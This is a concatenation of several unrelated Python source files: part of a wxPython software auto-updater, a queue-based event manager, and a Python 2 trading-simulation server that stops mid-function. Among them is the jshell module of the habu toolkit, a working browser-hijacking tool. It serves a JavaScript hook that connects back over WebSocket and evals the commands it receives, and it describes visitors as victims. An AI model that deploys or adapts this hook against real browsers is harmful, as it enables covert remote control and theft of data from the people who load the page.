if result == wx.ID_YES:
autoUpdataProgressBar()
update_select_flag = 1
for file_process in list_dictionary.items():
if file_deal(file_process[0], file_process[1][4], file_process[1][6], file_process[1][0], file_process[1][7]) is False:
update_fail_flag = 1
list_local_file_dictionary[file_process[0]][3] = 0
else:
list_local_file_dictionary[file_process[0]][3] = 1
if file_process[1][8] == 1:
                            restart_flag = 1  # restart the program
elif result == wx.ID_NO:
print("用户选择不升级,继续运行主应用程序!")
for file_process in list_dictionary.items():
list_local_file_dictionary[file_process[0]][3] = 0
# exit_flag = 1
# os.system('taskkill /f /im QPYcom.exe')
autoMessageBar(dict_update_str)
            else:  # only ignorable update modes remain
                # show the user the files to update, their descriptions and version numbers
                update_show_text = {}  # content dict shown to the user: [file name, file version, update description]
for i in list_dictionary.items():
update_show_text.setdefault(i[0], []).append(i[1][5])
update_show_text.setdefault(i[0], []).append(i[1][1])
s1 = update_show_text.items()
# lst = []
for key, value in s1:
s3 = "更新文件:%s 更新内容:%s 更新版本:V%s" % (key, value[0], value[1])
# lst.append('\n' + s3)
# result = wx.MessageDialog(None, ' '.join(lst), u"可忽略升级提醒", wx.YES_NO | wx.CANCEL).ShowModal()
result = wx.MessageDialog(None, "有新的更新可用,请点击 [是] 进行更新,更新过程中请勿操作!", u"可忽略升级提醒", wx.YES_NO | wx.CANCEL).ShowModal()
if result == wx.ID_YES:
autoUpdataProgressBar()
update_select_flag = 1
for file_process in list_dictionary.items():
if file_deal(file_process[0], file_process[1][4], file_process[1][6], file_process[1][0], file_process[1][7]) is False:
update_fail_flag = 1
list_local_file_dictionary[file_process[0]][3] = 0
else:
list_local_file_dictionary[file_process[0]][3] = 1
if file_process[1][8] == 1:
                            restart_flag = 1  # restart the program
elif result == wx.ID_NO:
for file_process in list_dictionary.items():
list_local_file_dictionary[file_process[0]][3] = 2
elif result == wx.ID_CANCEL:
for file_process in list_dictionary.items():
list_local_file_dictionary[file_process[0]][3] = 0
else:
if id == 1:
print("手动检查无更新,窗口提示!")
wx.MessageDialog(None, "已经是最新版本,无新升级内容", u"提醒", wx.OK).ShowModal()
else:
print("定时检查无更新,不窗口提示!")
autoMessageBar(dict_update_str)
else:
        # written this way to support combined ("combo") update operations
list_update_mode = []
list_restart_mode = []
for list_value_update in list_cloud_update_mode_file_dictionary.values():
for value in list_value_update:
list_update_mode.append(value)
for list_value_restart in list_cloud_restart_file_dictionary.values():
for value in list_value_restart:
list_restart_mode.append(value)
        # prompt the user according to the [update mode] of the files that need updating
        if 3 in list_update_mode:  # a forced-update mode is present
            print("This update contains files that require a forced update")
list_cloud_file_dictionary_temp = copy.deepcopy(list_cloud_file_dictionary)
for file_process in list_cloud_file_dictionary.items():
                if file_process[1][0] == 0:  # silent-update file
del list_cloud_file_dictionary_temp[file_process[0]]
if file_deal(file_process[0], file_process[1][4], file_process[1][6], file_process[1][7], file_process[1][3]) is False:
update_fail_flag = 1
            if list_cloud_file_dictionary_temp:  # after removing the silent-update files
sorted_dictionary = sorted(list_cloud_file_dictionary_temp.items(),
key=lambda list_cloud_file_dictionary: list_cloud_file_dictionary[1],
reverse=True)
                update_show_text = {}  # content dict shown to the user, in descending order: [file name, file version, update description]
for i in sorted_dictionary:
update_show_text.setdefault(i[0], []).append(i[1][1])
update_show_text.setdefault(i[0], []).append(i[1][2])
s1 = update_show_text.items()
# lst = []
for key, value in s1:
s3 = "更新文件:%s 更新内容:%s 更新版本:V%s" % (key, value[0], value[1])
# lst.append('\n' + s3)
# result = wx.MessageDialog(None, ' '.join(lst), u"强制升级提醒", wx.YES_NO).ShowModal()
# result = wx.MessageDialog(None, "有新的更新可用,请点击 [是] 进行更新,更新过程中请勿操作!", u"强制升级提醒", wx.YES_NO).ShowModal()
# result = wx.MessageDialog(None, "有新的更新可用,请点击 [是] 进行更新,更新过程中请勿操作!", u"更新提示(非强制)", wx.YES_NO)、
result = wx.MessageDialog(None, dict_update_str["update-message"], u"更新提示(非强制)", wx.YES_NO).ShowModal()
if result == wx.ID_YES: # 当用户点击确认升级操作后
autoUpdataProgressBar()
update_select_flag = 1
for file_process in list_cloud_file_dictionary_temp.items():
                        # a forced update is present, so update every file in the dict according to its opera mode
if file_deal(file_process[0], file_process[1][4], file_process[1][6], file_process[1][7], file_process[1][3]) is False:
update_fail_flag = 1
list_local_file_dictionary[file_process[0]][3] = 0
else:
list_local_file_dictionary[file_process[0]][3] = 1
                elif result == wx.ID_NO:  # the user declined, so exit the main application
                    print("User declined the update; exiting the main application!")
for file_process in list_cloud_file_dictionary_temp.items():
list_local_file_dictionary[file_process[0]][3] = 0
# os.system('taskkill /f /im QPYcom.exe')
# exit_flag = 1
autoMessageBar(dict_update_str)
return
            # after all file operations finish, check whether any file requires a restart; if so, restart the main program, otherwise it is a hot update
            if 1 in list_restart_mode:  # a main-program restart is required
                wx.MessageDialog(None, "An update was detected; a restart is required to finish it", u"Notice", wx.OK).ShowModal()
restart_flag = 1
        # update all silent-update files and remove them from the update dict, leaving only ignorable files; silent mode appears in patterns such as 0 0 0 and 0 1 2
        elif 0 in list_update_mode:  # a silent-update mode is present
            print("This update contains silent-update files!")
list_cloud_file_dictionary_temp = copy.deepcopy(list_cloud_file_dictionary)
for file_process in list_cloud_file_dictionary.items():
if file_process[1][0] == 0:
del list_cloud_file_dictionary_temp[file_process[0]]
if file_deal(file_process[0], file_process[1][4], file_process[1][6], file_process[1][7], file_process[1][3]) is False:
update_fail_flag = 1
            if list_cloud_file_dictionary_temp:  # if the dict is not empty after removing silent-mode files, prompt the user (only modes 1 and 2 remain)
                print("Dict is not empty: it contains both silent-update files and ignorable-update files!")
sorted_dictionary = sorted(list_cloud_file_dictionary_temp.items(),
key=lambda list_cloud_file_dictionary: list_cloud_file_dictionary[1],
reverse=True)
                update_show_text = {}  # content dict shown to the user: [file name, file version, update description]
for i in sorted_dictionary:
update_show_text.setdefault(i[0], []).append(i[1][1])
update_show_text.setdefault(i[0], []).append(i[1][2])
s1 = update_show_text.items()
# lst = []
for key, value in s1:
s3 = "更新文件:%s 更新内容:%s 更新版本:V%s" % (key, value[0], value[1])
# lst.append('\n' + s3)
# result = wx.MessageDialog(None, ' '.join(lst), u"升级提醒", wx.YES_NO | wx.CANCEL).ShowModal()
result = wx.MessageDialog(None, "有新的更新可用,请点击 [是] 进行更新,更新过程中请勿操作!", u"升级提醒", wx.YES_NO | wx.CANCEL).ShowModal()
if result == wx.ID_YES: # 当用户点击确认升级操作后
autoUpdataProgressBar()
update_select_flag = 1
for file_process in list_cloud_file_dictionary_temp.items():
if file_deal(file_process[0], file_process[1][4], file_process[1][6], file_process[1][7], file_process[1][3]) is False:
update_fail_flag = 1
list_local_file_dictionary[file_process[0]][3] = 0
else:
list_local_file_dictionary[file_process[0]][3] = 1
                elif result == wx.ID_NO:  # the user chose to ignore the update
                    print("User chose to ignore the update!")
for file_process in list_cloud_file_dictionary_temp.items():
list_local_file_dictionary[file_process[0]][3] = 2
elif result == wx.ID_CANCEL:
print("用户选择无操作!")
for file_process in list_cloud_file_dictionary_temp.items():
list_local_file_dictionary[file_process[0]][3] = 0
else:
print("字典为空,只包含全0静默升级文件!")
# 待所有文件操作模式完成后判断是否有需要重启的文件 一旦有则重启整个应用程序 否则为热更新
if 1 in list_restart_mode: # 存在重启程序操作
# wx.MessageDialog(None, "程序检测到有更新,需要重启完成", u"提醒", wx.OK).ShowModal()
restart_flag = 1 # 程序重启标志位
# 剩下的文件均是可忽略升级模式(只包含永久忽略和本次忽略) [1,1,1] [2,2,2] [1,2,1]
else:
print("本次升级只包含可忽略的文件")
sorted_dictionary = sorted(list_cloud_file_dictionary.items(),
key=lambda list_cloud_file_dictionary: list_cloud_file_dictionary[1],
reverse=True)
            update_show_text = {}  # content dict shown to the user: [file name, file version, update description]
for i in sorted_dictionary:
update_show_text.setdefault(i[0], []).append(i[1][1])
update_show_text.setdefault(i[0], []).append(i[1][2])
s1 = update_show_text.items()
# lst = []
for key, value in s1:
s3 = "更新文件:%s 更新内容:%s 更新版本:V%s" % (key, value[0], value[1])
# lst.append('\n' + s3)
# result = wx.MessageDialog(None, ' '.join(lst), u"升级-可忽略升级", wx.YES_NO | wx.CANCEL).ShowModal()
result = wx.MessageDialog(None, "有新的更新可用,请点击 [是] 进行更新,更新过程中请勿操作!", u"可忽略升级提醒", wx.YES_NO | wx.CANCEL).ShowModal()
if result == wx.ID_YES: # 当用户点击升级操作后
autoUpdataProgressBar()
update_select_flag = 1
for file_process in list_cloud_file_dictionary.items():
if file_deal(file_process[0], file_process[1][4], file_process[1][6], file_process[1][7], file_process[1][3]) is False:
update_fail_flag = 1
list_local_file_dictionary[file_process[0]][3] = 0
else:
list_local_file_dictionary[file_process[0]][3] = 1
                # after all file operations finish, check whether any file requires a restart; if so, restart the main program, otherwise it is a hot update
                if 1 in list_restart_mode:  # a program restart is required
                    wx.MessageDialog(None, "An update was found that requires a restart", u"Notice", wx.OK).ShowModal()
restart_flag = 1
            elif result == wx.ID_NO:  # the user declined the update [1,1,1] [2,2,2] [1,2,1]
                print("User chose to ignore the update!")
for file_process in list_cloud_file_dictionary.items():
list_local_file_dictionary[file_process[0]][3] = 2
            elif result == wx.ID_CANCEL:  # the user took no action
                print("User took no action!")
for file_process in list_cloud_file_dictionary.items():
list_local_file_dictionary[file_process[0]][3] = 0
    # save the updated local config dict back to the local json config file
local_json = {"filelist": []}
for k in list_local_file_dictionary.keys():
        if '#' in k:  # combined-update case
temp_str = k.split('#')[0]
else:
temp_str = k
local_json["filelist"].append({'file': temp_str,
'md5': list_local_file_dictionary[k][0],
'ver': list_local_file_dictionary[k][1],
'updatemode': list_local_file_dictionary[k][2],
'ignore': list_local_file_dictionary[k][3],
'url': list_local_file_dictionary[k][4],
'updatedesp': list_local_file_dictionary[k][5],
'path': list_local_file_dictionary[k][6],
'opera': list_local_file_dictionary[k][7],
'restart': list_local_file_dictionary[k][8]},
)
# local_json_over = {"totalcount": len(list(set(list_cloud_file + list_local_file)))} # count 为合并本地云端,剔除重复元素后的长度
local_json_over = {"totalcount": len(list_local_file_dictionary.keys())}
local_json_over.update(local_json)
json_str = json.dumps(local_json_over, indent=4)
local_json_path = os.getcwd() + "\\" + "local_conf.json"
with open(local_json_path, 'w') as json_file:
json_file.write(json_str)
if update_fail_flag == 1 and update_select_flag == 1:
print("本次升级失败!")
window.close()
wx.MessageDialog(None, "软件更新失败! 请前往官网下载工具新版本。", u"提醒", wx.OK).ShowModal()
elif update_fail_flag == 0 and update_select_flag == 1:
print("本次升级成功!")
window.close()
wx.MessageDialog(None, "软件更新成功!", u"提醒", wx.OK).ShowModal()
if restart_flag == 0: # 应用程序是否重启操作,通过restart_flag标志来确保操作完成后才重启(这种情况代表正常启动)
pass
elif main_program_flag == 1 and update_fail_flag == 0:
DETACHED_PROCESS = 0x08000000
        subprocess.call('restart.bat', creationflags=DETACHED_PROCESS)  # run restart.bat
else:
restart_program()
    '''
    if exit_flag == 0:  # exit handling: exit_flag guarantees the exit only happens after all operations finish
        pass
    else:
        os.system('taskkill /f /im QPYcom.exe')
    '''
# manual update check; referenced by the main program
def thread_process_handle():
t = threading.Thread(target=json_process_handle, args=(1,))
t.start()
class RepeatingTimer(Timer):
def run(self):
while not self.finished.is_set():
self.function(*self.args, **self.kwargs)
self.finished.wait(self.interval)
# scheduled update check; referenced by the main program, the interval is two hours
def repeat_update_check():
global check_update_time
t = RepeatingTimer(check_update_time, json_process_handle, args=(0,))
t.start()
# progress window shown while the software updates
def autoUpdataProgressBar():
t1 = threading.Thread(target=updateWindow)
t1.start()
# notification window
def autoMessageBar(json_str):
# global update_messageCount
try:
force_read = json_str["force-read"] # 强制阅读模式
avail_data = json_str["avail-data"] # 弹窗显示开始时间
expire_data = json_str["expire-data"] # 弹窗显示结束时间
payload = json_str["payload"] # 需要弹窗显示的信息
pop_mode = json_str["pop-mode"] # 弹窗显示模式
if int(pop_mode) > 0:
if force_read == "0": #强制阅读模式"
if parse(avail_data) < datetime.datetime.now() < parse(expire_data): #在有效时间内
wx.MessageDialog(None, payload, u"更新信息提示", wx.OK).ShowModal()
# update_message = wx.MessageBox(None, dict_update_str["payload"], u"更新信息提示", wx.YES_DEFAULT | wx.ICON_INFORMATION).ShowModal(
json_str["pop-mode"] = int(json_str["pop-mode"]) - 1
# print(json_str)
with open(os.getcwd() + '\\' + 'update_message.json', 'w',encoding='utf-8') as f:
json.dump(json_str, f, ensure_ascii=False, indent=2)
else:
print("弹窗提示显示指定次数已完成")
except:
print("update-message配置文件加载失败")
if __name__ == '__main__':
thread_process_handle()
# repeat_update_check()
# autoUpdataProgressBar()
|
cmd_jshell.py
|
#!/usr/bin/env python3
import asyncio
import json
import threading
from datetime import datetime
from http import HTTPStatus
from pathlib import Path
from pprint import pprint
from queue import Queue
import click
import websockets
from prompt_toolkit.contrib.completers import WordCompleter
from prompt_toolkit.history import InMemoryHistory
from prompt_toolkit.layout.lexers import PygmentsLexer
from prompt_toolkit.shortcuts import prompt
from pygments.lexers import JavascriptLexer
from habu.config import config
from habu.lib.completeme.javascript import javascript as completer_list
hook_js = '''
endpoint = "ws://{ip}:{port}";
socket = new WebSocket(endpoint);
socket.onmessage = function(event){{
try {{
out = eval(event.data);
socket.send(out);
}}
catch(err) {{
socket.send(err);
}};
}};
'''
class MyWebSocketServerProtocol(websockets.server.WebSocketServerProtocol):
    ''' Returns the hook.js payload if the request is not a WebSocket upgrade request '''
@asyncio.coroutine
def process_request(self, path, request_headers):
if 'Upgrade' in request_headers.keys():
return None
print('>>> HTTP Request received from {}. Sending hookjs'.format(self.remote_address[0]))
if path.endswith('.js'):
response_headers = [
                ('Content-Length', len(hook_js)),
('Content-type', 'application/javascript'),
]
return (HTTPStatus.OK, response_headers, hook_js.encode())
document = '<html><body><script>' + hook_js + '</script></body></html>'
response_headers = [
            ('Content-Length', len(document)),
('Content-type', 'text/html'),
]
return (HTTPStatus.OK, response_headers, document.encode())
class Runner():
def __init__(self):
self.internal_commands = {
'_close': ('Closes the websocket', self.cmd_close),
'_help' : ('Show this help', self.cmd_help),
'_sessions' : ('List active sessions', self.cmd_sessions),
'_channel' : ('Print channel log', self.cmd_channel),
'_active' : ('Set active session (param: session_id)', self.cmd_active),
'_websocket': ('Show websocket info', self.cmd_websocket),
}
self.get_external_commands()
self.active = None
self.sessions = {}
def addifnew(self, websocket):
for s in self.sessions.values():
if s['websocket'] == websocket:
return False
if len(self.sessions) == 0:
session_id = '0'
else:
session_id = str(int(sorted(self.sessions.keys(), reverse=True)[0]) + 1)
self.sessions[session_id] = {
'name': '{}:{} {}'.format(
websocket.remote_address[0],
websocket.remote_address[1],
websocket.request_headers.get('User-Agent', 'No User Agent?'),
),
'websocket': websocket,
}
print(">>> Connection from {}".format(websocket.remote_address[0]))
return True
def get_external_commands(self):
self.external_commands = {}
for f in (config['DATADIR'] / 'jshell-commands').glob('*.js'):
with f.open() as cmd_file:
cmd_name = '_' + f.stem
cmd_help = cmd_file.readline().replace('//', '').strip()
cmd_content = cmd_file.read()
self.external_commands[cmd_name] = (cmd_help, cmd_content)
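    # External commands are the .js files under DATADIR/jshell-commands; the
    # first line of each file is read as its help text. A hypothetical example
    # file (name and body are assumptions, not shipped with this snippet):
    #   // Collect basic browser info
    #   JSON.stringify({userAgent: navigator.userAgent});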
def cmd_close(self):
print(">>> Closing connection")
for i in list(self.sessions):
if self.sessions[i]['websocket'] == self.active:
del self.sessions[i]
self.active = None
def cmd_sessions(self):
for i,s in self.sessions.items():
if self.active == s:
print('{} * {}'.format(i, s['name']))
else:
print('{} {}'.format(i, s['name']))
return True
def cmd_channel(self):
outfile = Path('session-{}-{}.txt'.format(self.active['websocket'].remote_address[0], self.active['websocket'].remote_address[1]))
if outfile.is_file():
with outfile.open() as of:
print(of.read(), '\n')
else:
print('No channel log yet')
def cmd_websocket(self):
pprint(dir(self.active['websocket']))
pprint(self.active['websocket'])
pprint(self.active['websocket'].request_headers)
pprint(dir(self.active['websocket'].request_headers))
pprint(self.active['websocket'].request_headers.get('User-Agent', 'No User Agent?'))
return True
def cmd_active(self, i):
i = str(i)
session = self.sessions.get(i, None)
if session:
if session['websocket'].open:
self.active = session
else:
print('Session is closed')
del self.sessions[i]
else:
print('Invalid session id')
def cmd_help(self):
print('\nInternal Commands ================================')
for cmd_name in self.internal_commands.keys():
print('{:<20} {}'.format(cmd_name, self.internal_commands[cmd_name][0]))
print('\nExternal Commands ================================')
for cmd_name in self.external_commands.keys():
print('{:<20} {}'.format(cmd_name, self.external_commands[cmd_name][0]))
async def send(self, command):
await self.active['websocket'].send(command)
async def run(self, command):
if not self.sessions:
print('No sessions')
return False
if not self.active:
for s in self.sessions.values():
self.active = s
break
if not command.startswith('_'):
await self.send(command)
return True
if ' ' in command:
arg = command.split(' ')[1]
command = command.split(' ')[0]
else:
arg = None
if command in self.internal_commands.keys():
if arg:
try:
self.internal_commands[command][1](arg)
except Exception as e:
print(e)
else:
try:
self.internal_commands[command][1]()
except Exception as e:
print(e)
elif command in self.external_commands.keys():
await self.send(self.external_commands[command][1])
else:
print('>>> Invalid command')
return True
runner = Runner()
queue = Queue()
async def sender_handler(websocket):
runner.addifnew(websocket)
while True:
if queue.empty():
await asyncio.sleep(1)
continue
command = queue.get()
try:
await runner.run(command)
except websockets.exceptions.ConnectionClosed:
print('>>> Connection lost.')
async def consumer(websocket, message):
if message.startswith('@##@'):
message = message.replace('@##@', '').strip()
outfile = Path('session-{}-{}.txt'.format(websocket.remote_address[0], websocket.remote_address[1]))
if not outfile.is_file():
header = '{} - {}:{} - {}\n'.format(
datetime.now(),
websocket.remote_address[0],
websocket.remote_address[1],
websocket.request_headers.get('User-Agent', 'No-User-Agent')
)
message = header + message
with outfile.open('a') as of:
of.write(message)
else:
try:
j = json.loads(message)
print(json.dumps(j, indent=4))
except ValueError:
print(message)
async def receiver_handler(websocket):
runner.addifnew(websocket)
# The commented only works with python3-websockets 4.x
'''
async for message in websocket:
await consumer(websocket, message)
'''
while True:
message = await websocket.recv()
await consumer(websocket, message)
async def handler(websocket, path):
sender_task = asyncio.ensure_future(sender_handler(websocket))
receiver_task = asyncio.ensure_future(receiver_handler(websocket))
done, pending = await asyncio.wait(
[sender_task, receiver_task],
return_when=asyncio.FIRST_COMPLETED,
)
@click.command()
@click.option('-v', 'verbose', is_flag=True, default=False, help='Verbose')
@click.option('-i', 'ip', default='127.0.0.1', help='IP to listen on')
@click.option('-p', 'port', default=3333, help='Port to listen on')
def cmd_jshell(ip, port, verbose):
"""Control a web browser through Websockets.
Bind a port (default: 3333) and listen for HTTP connections.
On connection, send a JavaScript code that opens a WebSocket that
can be used to send commands to the connected browser.
You can write the commands directly in the shell, or use plugins, that
are simply external JavaScript files.
Using habu.jshell you can completely control a web browser.
Reference: https://developer.mozilla.org/en-US/docs/Web/API/WebSockets_API
Example:
\b
$ habu.jshell
>> Listening on 192.168.0.10:3333. Waiting for a victim connection.
>> HTTP Request received from 192.168.0.15. Sending hookjs
>> Connection from 192.168.0.15
$ _sessions
0 * 192.168.0.15:33432 Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0
$ _info
{
"user-agent": "Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0",
"location": "http://192.168.0.10:3333/",
"java-enabled": false,
"platform": "Linux x86_64",
"app-code-name": "Mozilla",
"app-name": "Netscape",
"app-version": "5.0 (X11)",
"cookie-enabled": true,
"language": "es-AR",
"online": true
}
$ document.location
http://192.168.0.10:3333/
"""
global hook_js
hook_js = hook_js.format(ip=ip, port=port)
print('>>> Listening on {}:{}. Waiting for a victim connection.'.format(ip, port))
eventloop = asyncio.get_event_loop()
eventloop.run_until_complete(websockets.serve(handler, ip, port, create_protocol=MyWebSocketServerProtocol))
thread = threading.Thread(target=eventloop.run_forever)
thread.start()
completer = WordCompleter(completer_list + list(runner.internal_commands) + list(runner.external_commands))
history = InMemoryHistory()
while True:
if not thread.is_alive():
break
cmd = prompt('$ ', patch_stdout=True, completer=completer, history=history, lexer=PygmentsLexer(JavascriptLexer))
if cmd:
if cmd == '_help':
runner.cmd_help()
elif runner.sessions:
queue.put_nowait(cmd)
else:
print('>>> No active session!')
if __name__ == '__main__':
cmd_jshell()
|
event_manage.py
|
# -*- coding: utf-8 -*-
from queue import Queue, Empty
from threading import Thread
class EventManager:
"""
    A simple queue-based event manager that dispatches events to registered handlers.
"""
def __init__(self):
self.__eventQueue = Queue()
self.__active = False
self.__thread = Thread(target=self.__run)
        # e.g.
        # self.__handlers = {
        #     'type1': [method1, method2],
        #     'type2': [method3, method4],
        # }
self.__handlers = {}
def __run(self):
"""
        Engine loop: pull events off the queue and dispatch them.
"""
while self.__active:
try:
event = self.__eventQueue.get(block=True, timeout=1)
self.__event_process(event)
except Empty:
pass
def __event_process(self, event):
"""
Handling events .
"""
# Check if there is a handler for this event
if event.type_ in self.__handlers:
# If present, the events are passed to the handler in order
for handler in self.__handlers[event.type_]:
handler(event)
def start(self):
"""
Start event manager .
"""
self.__active = True
self.__thread.daemon = True
self.__thread.start()
def stop(self):
"""
Stop event manager .
"""
self.__active = False
self.__thread.join()
def add_event_handler(self, type_, handler):
"""
        Bind an event type to a listener handler.
        :param type_: the event type to listen for
        :param handler: callback function invoked with the event
"""
# Attempt to get a list of handler functions corresponding
# to an event type, create it if none .
try:
handler_list = self.__handlers[type_]
except KeyError:
handler_list = []
self.__handlers[type_] = handler_list
        # Register the handler only if it is not already in the
        # list for this event type.
if handler not in handler_list:
handler_list.append(handler)
def remove_event_handler(self, type_, handler):
"""
Remove handler .
"""
try:
handler_list = self.__handlers[type_]
if handler in handler_list:
handler_list.remove(handler)
if not handler_list:
del self.__handlers[type_]
except KeyError:
pass
def send_event(self, event):
"""
Send events and store events in the event queue .
"""
self.__eventQueue.put(event)
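# Minimal usage sketch (illustrative; the Event class below is an assumption --
# this module only requires objects that expose a `type_` attribute):
#
#   class Event:
#       def __init__(self, type_, data=None):
#           self.type_ = type_
#           self.data = data
#
#   manager = EventManager()
#   manager.add_event_handler('type1', lambda e: print('got', e.type_, e.data))
#   manager.start()
#   manager.send_event(Event('type1', {'payload': 42}))
#   manager.stop()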
|
server.py
|
################################################################################
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from itertools import izip as zip  # Python 2: itertools has no "zip"; izip is the lazy equivalent
from random import normalvariate, random
from datetime import timedelta, datetime
import csv
import dateutil.parser
import os.path
import operator
import json
import re
import threading
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from SocketServer import ThreadingMixIn
################################################################################
#
# Config
# Sim params
REALTIME = True
SIM_LENGTH = timedelta(days=365 * 5)
MARKET_OPEN = datetime.today().replace(hour=0, minute=30, second=0)
# Market parms
# min / max / std
SPD = (2.0, 6.0, 0.1)
PX = (60.0, 150.0, 1)
FREQ = (12, 36, 50)
# Trades
OVERLAP = 4
################################################################################
#
# Test Data
def bwalk(min, max, std):
""" Generates a bounded random walk. """
rng = max - min
while True:
max += normalvariate(0, std)
yield abs((max % (rng * 2)) - rng) + min
def market(t0=MARKET_OPEN):
""" Generates a random series of market conditions,
(time, price, spread).
"""
for hours, px, spd in zip(bwalk(*FREQ), bwalk(*PX), bwalk(*SPD)):
yield t0, px, spd
t0 += timedelta(hours=abs(hours))
def orders(hist):
""" Generates a random set of limit orders (time, side, price, size) from
a series of market conditions.
"""
for t, px, spd in hist:
stock = 'ABC' if random() > 0.5 else 'DEF'
side, d = ('sell', 2) if random() > 0.5 else ('buy', -2)
order = round(normalvariate(px + (spd / d), spd / OVERLAP), 2)
size = int(abs(normalvariate(0, 100)))
yield t, stock, side, order, size
################################################################################
#
# Order Book
def add_book(book, order, size, _age=10):
""" Add a new order and size to a book, and age the rest of the book. """
yield order, size, _age
for o, s, age in book:
if age > 0:
yield o, s, age - 1
def clear_order(order, size, book, op=operator.ge, _notional=0):
""" Try to clear a sized order against a book, returning a tuple of
(notional, new_book) if successful, and None if not. _notional is a
recursive accumulator and should not be provided by the caller.
"""
(top_order, top_size, age), tail = book[0], book[1:]
if op(order, top_order):
_notional += min(size, top_size) * top_order
sdiff = top_size - size
if sdiff > 0:
return _notional, list(add_book(tail, top_order, sdiff, age))
elif len(tail) > 0:
return clear_order(order, -sdiff, tail, op, _notional)
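# Worked example (illustrative): with book = [(10.0, 5, 10)] and the default
# operator.ge, clear_order(10.5, 3, book) matches the top level, accumulates a
# notional of 3 * 10.0 = 30.0 and returns (30.0, [(10.0, 2, 10)]) -- the two
# unfilled lots stay on the book at the same age.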
def clear_book(buy=None, sell=None):
""" Clears all crossed orders from a buy and sell book, returning the new
books uncrossed.
"""
while buy and sell:
order, size, _ = buy[0]
new_book = clear_order(order, size, sell)
if new_book:
sell = new_book[1]
buy = buy[1:]
else:
break
return buy, sell
def order_book(orders, book, stock_name):
""" Generates a series of order books from a series of orders. Order books
are mutable lists, and mutating them during generation will affect the
next turn!
"""
for t, stock, side, order, size in orders:
if stock_name == stock:
new = add_book(book.get(side, []), order, size)
book[side] = sorted(new, reverse=side == 'buy', key=lambda x: x[0])
bids, asks = clear_book(**book)
yield t, bids, asks
################################################################################
#
# Test Data Persistence
def generate_csv():
""" Generate a CSV of order history. """
with open('test.csv', 'wb') as f:
writer = csv.writer(f)
for t, stock, side, order, size in orders(market()):
if t > MARKET_OPEN + SIM_LENGTH:
break
writer.writerow([t, stock, side, order, size])
def read_csv():
""" Read a CSV or order history into a list. """
with open('test.csv', 'rb') as f:
for time, stock, side, order, size in csv.reader(f):
yield dateutil.parser.parse(time), stock, side, float(order), int(size)
################################################################################
#
# Server
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
""" Boilerplate class for a multithreaded HTTP Server, with working
shutdown.
"""
allow_reuse_address = True
def shutdown(self):
""" Override MRO to shutdown properly. """
self.socket.close()
HTTPServer.shutdown(self)
def route(path):
""" Decorator for a simple bottle-like web framework. Routes path to the
decorated method, with the rest of the path as an argument.
"""
def _route(f):
setattr(f, '__route__', path)
return f
return _route
def read_params(path):
""" Read query parameters into a dictionary if they are parseable,
otherwise returns None.
"""
query = path.split('?')
if len(query) > 1:
query = query[1].split('&')
return dict(map(lambda x: x.split('='), query))
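# Example (illustrative): read_params('/query?id=1&foo=bar') returns
# {'id': '1', 'foo': 'bar'}, while read_params('/query') has no query string,
# falls through and implicitly returns None.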
def get(req_handler, routes):
""" Map a request to the appropriate route of a routes instance. """
for name, handler in routes.__class__.__dict__.iteritems():
if hasattr(handler, "__route__"):
if None != re.search(handler.__route__, req_handler.path):
req_handler.send_response(200)
req_handler.send_header('Content-Type', 'application/json')
req_handler.send_header('Access-Control-Allow-Origin', '*')
req_handler.end_headers()
params = read_params(req_handler.path)
data = json.dumps(handler(routes, params)) + '\n'
req_handler.wfile.write(data)
return
def run(routes, host='0.0.0.0', port=8080):
""" Runs a class as a server whose methods have been decorated with
@route.
"""
class RequestHandler(BaseHTTPRequestHandler):
def log_message(self, *args, **kwargs):
pass
        def do_GET(self):  # BaseHTTPRequestHandler dispatches GET requests to do_GET
get(self, routes)
server = ThreadedHTTPServer((host, port), RequestHandler)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
    print('HTTP server started on port %s' % port)
    from time import sleep
    try:
        while True:
            sleep(1)
    except KeyboardInterrupt:
        server.shutdown()
################################################################################
#
# App
ops = {
'buy': operator.le,
'sell': operator.ge,
}
class App(object):
""" The trading game server application. """
def __init__(self):
self._book_1 = dict()
self._book_2 = dict()
self._data_1 = order_book(read_csv(), self._book_1, 'ABC')
self._data_2 = order_book(read_csv(), self._book_2, 'DEF')
self._rt_start = datetime.now()
self._sim_start, _, _ = self._data_1.next()
self.read_10_first_lines()
@property
def _current_book_1(self):
for t, bids, asks in self._data_1:
if REALTIME:
while t > self._sim_start + (datetime.now() - self._rt_start):
yield t, bids, asks
else:
yield t, bids, asks
@property
def _current_book_2(self):
for t, bids, asks in self._data_2:
if REALTIME:
while t > self._sim_start + (datetime.now() - self._rt_start):
yield t, bids, asks
else:
yield t, bids, asks
def read_10_first_lines(self):
for _ in xrange(10):
self._data_1.next()
self._data_2.next()
@route('/query')
def handle_query(self, x):
""" Takes no arguments, and yields the current top of the book; the
best bid and ask and their sizes
"""
try:
t1, bids1, asks1 = self._current_book_1.next()
t2, bids2, asks2 = self._current_book_2.next()
except Exception as e:
print("error getting stocks...reinitalizing app")
self.__init__()
t1, bids1, asks1 = self._current_book_1.next()
t2, bids2, asks2 = self._current_book_2.next()
t = t1 if t1 > t2 else t2
print('Query received @ t%s' % t)
return [{
'id': x and x.get('id', None),
'stock': 'ABC',
'timestamp': str(t),
'top_bid': bids1 and {
'price': bids1[0][0],
'size': bids1[0][1]
},
'top_ask': asks1 and {
'price': asks1[0][0],
